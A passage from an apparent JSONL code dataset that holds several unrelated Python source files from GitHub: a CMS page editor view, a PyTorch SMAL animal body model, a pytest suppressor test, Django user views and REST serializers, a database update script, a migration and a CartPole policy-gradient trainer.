\")\n\n\nclass PageEdit(EditView):\n\n pass\n\n\nclass PageLayout(PageView):\n\n \"\"\" Edit view for page \"\"\"\n\n @property\n def is_edit(self):\n\n return True\n\n @property\n def raw_content(self):\n\n return self.context._content\n\n def save(self):\n\n \"\"\" Parse html, and extract blocks. \"\"\"\n\n parser = Parser(self.context)\n\n self.context.clear_blocks()\n\n parser.parse(self.request.params.get('content', \"\"))\n\n self.context._p_changed = True\n\n self.context._content = self.request.params.get('content', \"\")\n\n return {}\n\n def save_block(self):\n\n \"\"\" but not really... we only create the proper html \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': ''}\n\n block = clazz(self.request.params.get(\"id\"), **self.request.params)\n\n if block['type'] == \"image\":\n\n if self.request.params.get('mode') == 'add':\n\n img_id = self.context.generate_content_id(\n self.request.params.get('img').filename)\n\n img = Image(img_id,\n {'name': img_id,\n 'data': {\n 'name': self.request.params.get('img').filename,\n 'data': self.request.params.get('img').value\n }\n })\n\n self.context.add_content(img)\n\n block['img_url'] = '%s%s' % (self.url, img_id)\n\n self.request.is_edit = True\n\n return \"%s\" % render_view(block, self.request)\n\n self.request.is_edit = True\n\n return render_view(block, self.request)\n\n def add_form(self):\n\n \"\"\" show add form for given type \"\"\"\n\n typp = self.request.params.get('type')\n clazz = Registry.get_type(typp)\n\n if not clazz:\n return {'html': 'No form found'}\n\n tpl = PageTemplate(clazz.add_form)\n\n form = tpl(data={\n 'id': generate_id(prefix=\"%s_\" % typp, length=10)})\n\n return {'html': form}\n\n def edit_form(self):\n\n \"\"\" Show edit form for given block type \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': 'No form found'}\n\n tpl = PageTemplate(clazz.edit_form)\n\n data = self._params_to_dict(self.request.params)\n data['mode'] = 'edit'\n\n form = tpl(data=data)\n\n return {'html': form}\n\n def get_block(self, block_id):\n\n return self.context.get_block_by_ref(block_id)\n\n def page_actions(self):\n\n layoutsubs = [\n {'id': 'grid',\n 'title': 'Grid',\n 'action': 'javascript: pycms.selectLayout(\"grid\")',\n 'permission': 'edit'\n },\n {'id': '2col',\n 'title': '2 columns',\n 'action': 'javascript: pycms.selectLayout(\"2col\")',\n 'permission': 'edit'\n },\n {'id': '3col',\n 'title': '3 columns',\n 'action': 'javascript: pycms.selectLayout(\"3col\")',\n 'permission': 'edit'\n },\n {'id': '4col',\n 'title': '4 columns',\n 'action': 'javascript: pycms.selectLayout(\"4col\")',\n 'permission': 'edit'\n },\n ]\n\n subs = []\n\n for tp in Registry.list_types():\n\n subs.append({'id': 'add_%s' % tp,\n 'title': '%s' % tp,\n 'action': 'javascript: pycms.addBlock(\"%s\")' % tp,\n 'permission': 'edit'\n })\n\n return [\n {'id': 'pick_layout',\n 'title': 'Select layout...',\n 'action': '',\n 'permission': 'edit',\n 'subs': layoutsubs\n },\n {'id': 'add_block',\n 'title': 'Add block...',\n 'action': '',\n 'permission': 'edit',\n 'subs': subs\n },\n {'id': 'delete',\n 'title': 'Delete',\n 'action': 'javascript: pycms.deleteBlock()',\n 'permission': 'edit'\n },\n {'id': 'edit',\n 'title': 'Edit',\n 'action': 'javascript: pycms.editBlock()',\n 'permission': 'edit'\n },\n {'id': 'cut',\n 'title': 'Cut',\n 'action': 'javascript: pycms.cutBlock()',\n 'permission': 'edit'\n },\n {'id': 'paste',\n 'title': 'Paste',\n 'action': 'javascript: pycms.pasteBlock()',\n 'permission': 'edit'\n },\n {'id': 'save',\n 'title': 'Save',\n 'action': 'javascript: pycms.savePage()',\n 'permission': 'edit'\n },\n ]\n\n def _params_to_dict(self, params):\n\n \"\"\" create simple dict from multidict \"\"\"\n\n simple = {}\n\n for key in list(params.keys()):\n\n simple[key] = params.get(key)\n\n return simple\n","repo_name":"wyldebeast-wunderliebe/w20e.pycms","sub_path":"w20e/pycms/views/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
+{"seq_id":"20029746349","text":"\"\"\"\n\n PyTorch implementation of the SMAL/SMPL model\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport pickle as pkl \nfrom .batch_lbs import batch_rodrigues, batch_global_rigid_transformation\nfrom .smal_basics import align_smal_template_to_symmetry_axis, get_smal_template\nimport torch.nn as nn\nimport config\n\n# There are chumpy variables so convert them to numpy.\ndef undo_chumpy(x):\n return x if isinstance(x, np.ndarray) else x.r\n\n\n'''\nJ_regressor_prior: prior on the joint regressor matrix\nJ_regressor: joint regressor matrix\nf: faces (indices of 3 vertices each)\nkintree_table: kinematic tree table\nJ: joint locations\nweight_prior: skinning weight prior\nweight: skinning weights\nvert_sym_idxs: vertex indices\nposedirs: pose corrective blend shapes\nbs_type: pose blend-shape skinning type (lrotmin)\nv_template: T-pose vertex positions (base model)\nshapedirs: shape corrective blend shapes\nbs_style: shape blend-shape skinning type (lbs)\n'''\n\n\ndef caclulate_bone_lengths_from_J(J, parents):\n # NEW: calculate bone lengths:\n all_bone_lengths_list = []\n for i in range(1, parents.shape[0]):\n bone_vec = J[:, i] - J[:, parents[i]]\n bone_length = torch.sqrt(torch.sum(bone_vec ** 2, axis=1)) # distance between a pair of skeleton joints within one batch\n all_bone_lengths_list.append(bone_length)\n all_bone_lengths = torch.stack(all_bone_lengths_list)\n\n return all_bone_lengths # .permute((1,0))\n\nclass SMAL(nn.Module):\n def __init__(self, device, shape_family_id=-1, dtype=torch.float):\n super(SMAL, self).__init__()\n\n # -- Load SMPL params --\n # with open(pkl_path, 'r') as f:\n # dd = pkl.load(f)\n \n with open(config.SMAL_FILE, 'rb') as f:\n u = pkl._Unpickler(f)\n u.encoding = 'latin1'\n dd = u.load()\n\n self.f = dd['f']\n '''(7774,3) number of triangle mesh faces'''\n self.faces = torch.from_numpy(self.f.astype(int)).to(device)\n\n # replaced logic in here (which required SMPL library with L58-L68)\n '''(3889,3) base template model'''\n v_template = get_smal_template(\n model_name=config.SMAL_FILE,\n data_name=config.SMAL_DATA_FILE,\n shape_family_id=-1)\n\n v_sym, self.left_inds, self.right_inds, self.center_inds = \\\n align_smal_template_to_symmetry_axis(v_template, sym_file=config.SMAL_SYM_FILE)\n # Mean template vertices\n self.v_template = Variable(torch.Tensor(v_sym),requires_grad=False).to(device)\n\n # Size of mesh [Number of vertices, 3]\n self.size = [v_template.shape[0], 3]\n '''(3889,3,41) >> 41'''\n self.num_betas = dd['shapedirs'].shape[-1]\n # Shape blend shape basis\n '''(41,11667)'''\n shapedir = np.reshape(\n undo_chumpy(dd['shapedirs']), [-1, self.num_betas]).T.copy()\n\n self.shapedirs = Variable(\n torch.Tensor(shapedir), requires_grad=False).to(device)\n\n # if shape_family_id != -1:\n # with open(config.SMAL_DATA_FILE, 'rb') as f:\n # u = pkl._Unpickler(f)\n # u.encoding = 'latin1'\n # data = u.load()\n # # Select mean shape for quadruped type\n # '''(5,41) >> (41,) selects the specified base animal model'''\n # # betas = data['cluster_means'][shape_family_id]# category-specific model\n # betas = np.zeros_like(data['cluster_means'][shape_family_id])\n # '''(3889,3)'''\n # v_template = v_template + np.matmul(betas[None,:], shapedir).reshape(\n # -1, self.size[0], self.size[1])[0]\n\n # (35,3889)\n # Regressor for joint locations given shape \n # self.J_regressor = Variable(\n # torch.Tensor(dd['J_regressor'].T.todense()),\n # requires_grad=False).to(device)\n\n self.J_regressor = Variable(\n torch.Tensor(dd['J_regressor'].T), requires_grad=False).to(device)###\n\n\n # Pose blend shape basis =306\n num_pose_basis = dd['posedirs'].shape[-1]\n \n posedirs = np.reshape(\n undo_chumpy(dd['posedirs']), [-1, num_pose_basis]).T\n self.posedirs = Variable(\n torch.Tensor(posedirs), requires_grad=False).to(device)\n # (2,35)\n # indices of parents for each joints\n self.parents = dd['kintree_table'][0].astype(np.int32)\n self.kintree_table = dd['kintree_table']\n\n # LBS weights\n self.weights = Variable(\n torch.Tensor(undo_chumpy(dd['weights'])),\n requires_grad=False).to(device)\n\n\n def __call__(self, beta, theta, trans=None, del_v=None, betas_logscale=None, get_skin=True, v_template=None):\n\n if True:\n nBetas = beta.shape[1]\n else:\n nBetas = 0\n\n # print(\"\\ntheta: \",theta)\n\n \n # v_template = self.v_template.unsqueeze(0).expand(beta.shape[0], 3889, 3)\n if v_template is None:\n v_template = self.v_template\n\n # 1. Add shape blend shapes\n \n if nBetas > 0:#20\n if del_v is None:\n # print(\"\\nbeta: \", beta)\n v_shaped = v_template + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n else:\n v_shaped = v_template + del_v + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n else:\n if del_v is None:\n v_shaped = v_template.unsqueeze(0)\n else:\n v_shaped = v_template + del_v \n '''regress the 3889 vertices to the 35 joint locations'''\n # 2. Infer shape-dependent joint locations.\n Jx = torch.matmul(v_shaped[:, :, 0], self.J_regressor)\n Jy = torch.matmul(v_shaped[:, :, 1], self.J_regressor)\n Jz = torch.matmul(v_shaped[:, :, 2], self.J_regressor)\n #(1,35,3)\n J = torch.stack([Jx, Jy, Jz], dim=2)\n\n # all_bone_length = caclulate_bone_lengths_from_J(J,self.parents)\n # print(all_bone_length.shape, all_bone_length)\n # np.savetxt(\"/media/scau2311/A/xcg/barc_release/data/pig_smal_data/mean_pig_bone_lengths.txt\",\n # all_bone_length, fmt=\"%.18f\")\n\n # 3. Add pose blend shapes\n # N x 24 x 3 x 3\n if len(theta.shape) == 4:\n Rs = theta\n else:# N x 35 x 3 x 3 global joint rotations expressed as 3x3 rotation matrices\n # theta[0,0] = torch.zeros(1, 3)\n Rs = torch.reshape(batch_rodrigues(torch.reshape(theta, [-1, 3])), [-1, 35, 3, 3])\n \n # Ignore global rotation.\n # (1,306) relative rotation between the current pose and the rest pose, 34X9\n pose_feature = torch.reshape(Rs[:, 1:, :, :] - torch.eye(3).to(beta.device), [-1, 306])\n # print(pose_feature)\n #(1,3889,3)\n v_posed = torch.reshape(\n torch.matmul(pose_feature, self.posedirs),# blend-shape computation\n [-1, self.size[0], self.size[1]]) + v_shaped\n #J_transformed=(1,35,3), 3 elements?\n #A=(1,35,4,4)\n #4. Get the global joint location: with joint 0 as the root, the other joints' rotations relative to it express the model's global rotation\n self.J_transformed, A = batch_global_rigid_transformation(\n Rs, J, self.parents)#, betas_logscale=betas_logscale\n\n\n # 5. Do skinning:\n num_batch = theta.shape[0]\n #(3889,35) skinning weights\n weights_t = self.weights.repeat([num_batch, 1])\n W = torch.reshape(weights_t, [num_batch, -1, 35])\n\n #(1,3889,4,4)\n T = torch.reshape(\n torch.matmul(W, torch.reshape(A, [num_batch, 35, 16])), [num_batch, -1, 4, 4])\n #(1,3889,4) append a column of ones\n v_posed_homo = torch.cat(\n [v_posed, torch.ones([num_batch, v_posed.shape[1], 1]).to(device=beta.device)], 2)\n #(1,3889,4,1)\n v_homo = torch.matmul(T, v_posed_homo.unsqueeze(-1))\n\n verts = v_homo[:, :, :3, 0]\n\n if trans is None:\n trans = torch.zeros((num_batch,3)).to(device=beta.device)\n\n verts = verts + trans[:, None, :]\n # print(\"tran: \",trans)\n\n # Get joints: joint locations after the transformation\n # joint_x = torch.matmul(verts[:, :, 0], self.J_regressor)\n # joint_y = torch.matmul(verts[:, :, 1], self.J_regressor)\n # joint_z = torch.matmul(verts[:, :, 2], self.J_regressor)\n # joints = torch.stack([joint_x, joint_y, joint_z], dim=2)\n joints = self.J_transformed\n\n joints = torch.cat([\n joints,\n verts[:, None, 257], # 35 nose\n verts[:, None, 237], # 36 chin\n verts[:, None, 3700], # 37 left ear tip\n verts[:, None, 1820], # 38 right ear tip\n verts[:, None, 3816], # 39 left eye\n verts[:, None, 1936], # 40 right eye\n verts[:, None, 321], # 41 throat\n ], dim = 1) \n\n # import matplotlib.pyplot as plt\n # plt.ion()\n # plt.figure(figsize=[10, 8])\n # ax = plt.axes(projection=\"3d\")\n # joints_x, joints_y, joints_z = joints.cpu()[0][:, 0].detach().numpy(), joints.cpu()[0][:, 1].detach().numpy(), joints.cpu()[0][:,2].detach().numpy()\n # verts_x, verts_y, verts_z = v_template[:, 0].cpu().detach().numpy(), v_template[:, 1].cpu().detach().numpy(),v_template[:, 2].cpu().detach().numpy()\n #\n # # ax.scatter3D(joints_x, joints_y, joints_z, s=50, c='red', label='3d')\n # ax.scatter3D(verts_x, verts_y, verts_z, s=10, c='blue', label='3d',alpha=0.5)\n # for i, j in enumerate(config.PIG_MODEL_JOINTS_NAME):\n # ax.text3D(joints.cpu()[0][i][0].detach().numpy(), joints.cpu()[0][i][1].detach().numpy(),\n # joints.cpu()[0][i][2].detach().numpy(), j)\n # # ax.scatter3D(proj_points[0][:, 0].detach().numpy(), proj_points[0][:, 1].detach().numpy(),\n # # np.zeros_like(proj_points[0][:,0].detach().numpy()), s=50, c='blue', label='2d')\n # ax.legend()\n # # kintree_table = [[6, 7], [7, 8], [8, 11], [9, 10], [10, 11], [3, 4], [4, 5], [3, 4],\n # # [0, 1], [1, 2], [2, 5], [2, 8], [2, 15],\n # # [8, 16], [15, 19], [16, 20],\n # # [16, 22], [15, 21], [21, 17], [22, 17], [18, 17],\n # # [11, 12], [5, 12], [12, 13], [13, 14]]\n # for i in self.kintree_table.T:\n # if i[0] > 35:\n # i=[0,0]\n # x1, y1, z1 = [], [], []\n # x2, y2, z2 = [], [], []\n # for j in i: # connect the two points\n # x1.append(float(joints_x[j]))\n # y1.append(float(joints_y[j]))\n # z1.append(float(joints_z[j]))\n # x2.append(float(Jx[0][j]))\n # y2.append(float(Jy[0][j]))\n # z2.append(float(Jz[0][j]))\n # ax.plot3D(x1, y1, z1, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10,\n # label=\"first\")\n # # ax.plot3D(x2, y2, z2, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10, label=\"second\")\n # ax.text3D(x1[0], y1[0], z1[0], \"3d\", fontsize=10)\n # # ax.text3D(x2[0], y2[0], z2[0], \"second\", fontsize=10)\n # # plt.savefig(rf\"E:\\DL\\SMALify\\outputs\\pigs\\vis_joints\\{time.time()}.png\")\n # # plt.close('all')\n # plt.xlabel('X')\n # plt.ylabel('Y') # rotate the y-axis label 38 degrees\n # ax.set_zlabel('Z', rotation=90) # plt cannot set the z-axis label, so it has to be set via ax (the x- and y-axis labels can also be set via ax)\n # import time\n # time0 = time.time()\n # # plt.savefig(f\"/media/scau2311/A/xcg/SMALify/outputs/pigs/000000054901/vis_results/3d_joint_{time0}.jpg\")\n # plt.pause(10)\n # plt.show()\n\n if get_skin:\n return verts, joints, Rs, v_shaped##\n else:\n return joints\n","repo_name":"G-Apple1/SMALify-Pig3D","sub_path":"smal_model/smal_torch.py","file_name":"smal_torch.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"22529547208","text":"from __future__ import absolute_import\nfrom typing import Tuple\nimport os\nimport json\n\nimport pytest\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\nfrom castor.detector.suppressor.suppressor import SuppressorPipeline\nfrom castor.utils import logger as llogger\nfrom castor.utils import const as con\nfrom castor.detector.cache.cache import CacheSet\nfrom castor.detector.cache.organize_cache import clear_cache\n\npd.set_option(\"display.max_rows\", None)\npd.set_option(\"display.max_columns\", None)\n\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\nTESTS_PATH = os.path.split(CURRENT_PATH)[0]\nCONF_PATH = os.path.join(\n Path(__file__).parents[2], \"demo\", \"demo_conf\", \"detect_base.yaml\"\n)\nDATA_PATH = os.path.join(TESTS_PATH, \"data\")\nwith open(os.path.join(TESTS_PATH, \"conf\", \"test.json\")) as f:\n tests_params = json.load(f)\nllogger.basic_config(level=\"DEBUG\")\n\nsuppress_module = [\"transient\", \"continuous\"]\nif_anomaly = [True, False]\n\nparams = {\n \"transient\": {\n \"cache_length\": 30,\n \"TransientAnomalySuppressor\": {con.WINDOW: 5, \"anomalies\": 3},\n },\n \"continuous\": {\n \"cache_length\": 30,\n \"ContinuousAnomalySuppressor\": {con.GAP: \"10D\"},\n },\n}\n\nresult = {\"transient\": {True: 1, False: 0}, \"continuous\": {True: 1, False: 0}}\n\n\ndef pandas_wrap(data: np.ndarray, data_type: str):\n if data_type == \"detect_result\":\n return pd.DataFrame(\n data,\n index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n elif data_type == \"ori_data\":\n return pd.DataFrame(\n data,\n index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n else:\n return None\n\n\ndef data_generation(\n module: str, status: bool, length: int\n) -> Tuple[pd.DataFrame, pd.DataFrame]:\n label = np.array([False] * length).reshape(-1, 1)\n ori_data = np.ones((length, 1))\n if module == \"transient\":\n label[50:60, 0] = True\n if status:\n label[62, 0] = True\n else:\n label[63, 0] = True\n elif module == \"continuous\":\n label[58, 0] = True\n if status:\n label[70, 0] = True\n else:\n label[63, 0] = True\n\n return pandas_wrap(ori_data, data_type=\"ori_data\"), pandas_wrap(\n label, data_type=\"detect_result\"\n )\n\n\n@pytest.mark.usefixtures(\"env_ready\")\nclass TestSuppressor:\n @pytest.fixture()\n def env_ready(self):\n self.tear_up()\n yield\n self.tear_down()\n\n def tear_up(self):\n pass\n\n def tear_down(self):\n clear_cache()\n\n @pytest.mark.parametrize(\"module\", suppress_module)\n @pytest.mark.parametrize(\"if_anomaly_bool\", if_anomaly)\n def test_suppress(self, module, if_anomaly_bool):\n suppressor_name = {\n \"transient\": \"TransientAnomalySuppressor\",\n \"continuous\": \"ContinuousAnomalySuppressor\",\n }\n cache_length = {\"transient\": 1, \"continuous\": 1}\n cache = CacheSet().get_cache(con.SUPPRESS_CACHE)\n data, detect_results = data_generation(module, if_anomaly_bool, 100)\n suppressor = SuppressorPipeline(name=\"Gemini\", params=params.get(module))\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[:30, :], con.ORIGIN: data.iloc[:30, :]}\n )\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[30:60, :], con.ORIGIN: data.iloc[30:60, :]}\n )\n print(f'result: {\"Gemini\" + suppressor_name.get(module) + \"lacolumn\"}')\n\n cache_result = [col for col in cache.keys() if str(col).startswith(\"Gemini\")]\n assert len(cache_result) == cache_length.get(module)\n detect_results = suppressor.suppress(\n {con.LABEL: detect_results.iloc[60:, :], con.ORIGIN: data.iloc[60:, :]}\n )\n print(f\"detect_result: {detect_results}\")\n print(f\"SuppressCache: {CacheSet().get_cache(con.SUPPRESS_CACHE)._cache}\")\n assert sum(detect_results.get(con.LABEL).iloc[:, 0]) == result.get(module).get(\n if_anomaly_bool\n )\n","repo_name":"openGemini/openGemini-castor","sub_path":"tests/suppressor/test_suppressor_cache.py","file_name":"test_suppressor_cache.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"36"}
+{"seq_id":"38915897410","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import UserCreationForm,editarperrfilform\n\ndef registro(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = UserCreationForm()\n return render(request,'registration/registro.html',{'form':form})\n\n@login_required\ndef editarperfil(request):\n user = request.user\n if request.method == 'POST':\n form = editarperrfilform(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = editarperrfilform(instance=user)\n return render(request, 'registration/editar_perfil.html', {'form': form})\n","repo_name":"zk-error/myshop","sub_path":"cuentas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"20885255117","text":"import sys, json, re, os\nHOME=os.path.expanduser(\"~\")\nsys.path.append(os.path.join(HOME, 'lmfdb'))\n\nfrom lmfdb import db\n\nadict = {}\n\nadictaut = {}\n\nfor fn in [\"grdata.out\", \"grdata_aut.out\"]:\n print (\"Reading \"+fn)\n fh=open(fn)\n for line in fh.readlines():\n line = line.strip()\n if re.match(r'\\S', line):\n line = line.replace(r\"'\", r'\"')\n l = json.loads(line)\n ambient = l[0]\n final=l[1]\n for a in final:\n full_label = \"%s.%s\"%(ambient, a[0])\n if fn == \"grdata.out\":\n adict[full_label] = int(round(a[1]))\n else:\n adictaut[full_label] = int(round(a[1]))\n #print ({'label': '%s.%s'%(lab, a[0])}, {'diagram_x': a[1]})\n #db.gps_subgroups.upsert({'label': '%s'%(a[0])}, {'diagram_x': int(round(a[1]))})\n fh.close()\n\n\n#for a in final:\n# db.gps_subgroups.upsert({'label': '%s.%s'%(gp, a[0])}, {'diagram_x': a[1]})\n\ndef modif(ent):\n global adict\n lab = ent['label']\n if lab in adict:\n ent['diagram_x'] = adict[lab]\n if lab in adictaut:\n ent['diagram_aut_x'] = adictaut[lab]\n return ent\n\ndb.gps_subgroups.rewrite(modif)\n\n","repo_name":"roed314/FiniteGroups","sub_path":"Code/LMFDB/grfinish.py","file_name":"grfinish.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"13271035173","text":"from rest_framework import serializers\nfrom snippets.models import Snippet, CourseList, CoursePage\nfrom django.contrib.auth.models import User, Group\nfrom django.core.mail import send_mail\nfrom tutorial.settings import BASE_URL\nfrom utils.token_generator import token_generator, create_email_confirm_url\n\n# class SnippetSerializer(serializers.ModelSerializer):\nclass SnippetSerializer(serializers.HyperlinkedModelSerializer):\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n class Meta:\n model = Snippet\n # fields = ('id', 'title', 'code', 'linenos', 'language', 'style', 'owner')\n fields = ('url', 'id', 'title', 'owner')\n\n\nclass CreateSnippetSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n\n class Meta:\n model = Snippet\n fields = (\n 'url', 'id', 'title', 'code', 'linenos', 'language',\n 'style', 'owner', 'perm_list'\n )\n\n\n# class UserSerializer(serializers.ModelSerializer):\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n # snippets = serializers.PrimaryKeyRelatedField(many=True, queryset=Snippet.objects.all())\n snippets = serializers.HyperlinkedRelatedField(\n many=True, view_name='snippet-detail',\n read_only=True\n )\n\n class Meta:\n model = User\n fields = ('id', 'username', 'snippets')\n\n\nclass UserCreateSerializer(serializers.ModelSerializer):\n password = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n user = User.objects.create(\n username=validated_data['username'],\n is_active = False,\n email = validated_data['email']\n )\n print('SOMEPRINT',validated_data)\n print('SOMEPRINT')\n token = token_generator.make_token(user)\n url = create_email_confirm_url(user.id, token)\n print('SOMEPRINT', url)\n # ~ send_mail(\n # ~ 'Activation on Django', url, 'djangodev108@gmail.com',\n # ~ [validated_data['email']], fail_silently=False\n # ~ )\n user.set_password(validated_data['password'])\n user.groups.add(1)\n user.save()\n if User.objects.filter(username=self.validated_data['username']).exists():\n send_mail(\n 'Activation on Django', url, 'djangodev108@gmail.com',\n [validated_data['email']], fail_silently=False\n )\n else:\n print('SOMEPRINT wrong')\n return user\n\n class Meta:\n model = User\n fields = (\n 'id', 'username', 'password', 'email', 'first_name',\n 'last_name',\n )\n\n\nclass CreateCourseSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'owner')\n\n\nclass CreateCoursePageSerializer(serializers.ModelSerializer):\n class Meta:\n model = CoursePage\n fields = ('course', 'snippet', 'order', 'dtm')\n\n\nclass CourseListSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = CourseList\n fields = ('url', 'id', 'title', 'descrpt', 'owner')\n\n\nclass CoursePageSerializer(serializers.HyperlinkedModelSerializer):\n # snippet = serializers.HyperlinkedRelatedField(many=False, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n class Meta:\n model = CoursePage\n fields = ('order', 'title', 'dtm','snippet')\n\n\nclass CourseDetailSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.StringRelatedField(many=True)\n # pages_listing = serializers.HyperlinkedIdentityField(view_name='coursepage-list')\n pages = CoursePageSerializer(many=True, read_only=True)\n # ~ pages = serializers.HyperlinkedRelatedField(\n # ~ many=True,\n # ~ view_name='coursepage-detail',\n # ~ read_only=True\n # ~ )\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'pages')\n\n\nclass CourseDetailPageSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.HyperlinkedRelatedField(many=True, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n\n class Meta:\n model = CoursePage\n fields = ('title', 'order', 'dtm', 'snippet')\n","repo_name":"Serq108/DZ10","sub_path":"snippets/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28072424022","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lesson', '0001_initial'),\n ('word', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Exam',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('lesson_user', models.ForeignKey(related_name='exam', to='lesson.LessonUser')),\n ],\n ),\n migrations.AddField(\n model_name='answer',\n name='exam',\n field=models.ForeignKey(related_name='answer', to='exam.Exam'),\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(related_name='answers', to='word.Question'),\n ),\n ]\n","repo_name":"huyquyet/projectLearn","sub_path":"exam/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"35815255363","text":"import torch\nimport math\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom agents.policy_gradient import PGAgent\nimport gymnasium as gym\n\ndef visualize_in_gym(agent, env_name = \"\", inp_env = None, steps=100):\n \"\"\"\n render a environment and visualize it running N steps\n\n another possible solution can be gymnasium.experimental.wrappers.RecordVideoV0\n\n or gymnasium.utils.save_video.save_video?\n \"\"\"\n if inp_env:\n demo_env = inp_env\n else:\n demo_env = gym.make(env_name, render_mode = \"human\")\n observation, info = demo_env.reset()\n\n for _ in range(steps):\n action = agent.get_action(torch.from_numpy(observation)) # agent policy that uses the observation and info\n # insert an algorithm that can interact with env and output an action here\n observation, reward, terminated, truncated, _ = demo_env.step(action)\n if terminated or truncated:\n observation, info = demo_env.reset()\n\n if not inp_env:\n demo_env.close()\n\nenv = gym.make(\"CartPole-v1\")\n\nagent = PGAgent(4, 2)\n\ndemo_env = gym.make(\"CartPole-v1\", render_mode = \"human\")\n# gym.utils.play.play(demo_env, fps=128)\n\nwriter = SummaryWriter()\n\nDISCOUNTED_FACTOR = 0.9\n\nnum_episodes = 2000\nfor episode in range(num_episodes):\n episode_recorder = []\n observation, info = env.reset()\n done = False\n episode_reward = 0\n while not done:\n action = agent.get_action(torch.from_numpy(observation))\n next_observation, reward, terminated, truncated, _ = env.step(action)\n episode_recorder.append((observation, action, reward, next_observation))\n observation = next_observation\n done = terminated or truncated\n episode_reward += reward\n\n # for observation, action, reward, next_observation in reversed(episode_recorder):\n loss = agent.update(episode_recorder, DISCOUNTED_FACTOR)\n\n writer.add_scalar('Loss', loss, episode)\n writer.add_scalar('Reward', episode_reward, episode)\n if episode % 100 == 0:\n visualize_in_gym(agent, inp_env=demo_env)\n # visualize_in_gym(agent, env_name=\"CartPole-v1\")\n\n\nwriter.flush()\nwriter.close()\n\n\nvisualize_in_gym(agent, inp_env=demo_env)","repo_name":"zhilu1/rl_practice","sub_path":"cart_pole_PG.py","file_name":"cart_pole_PG.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
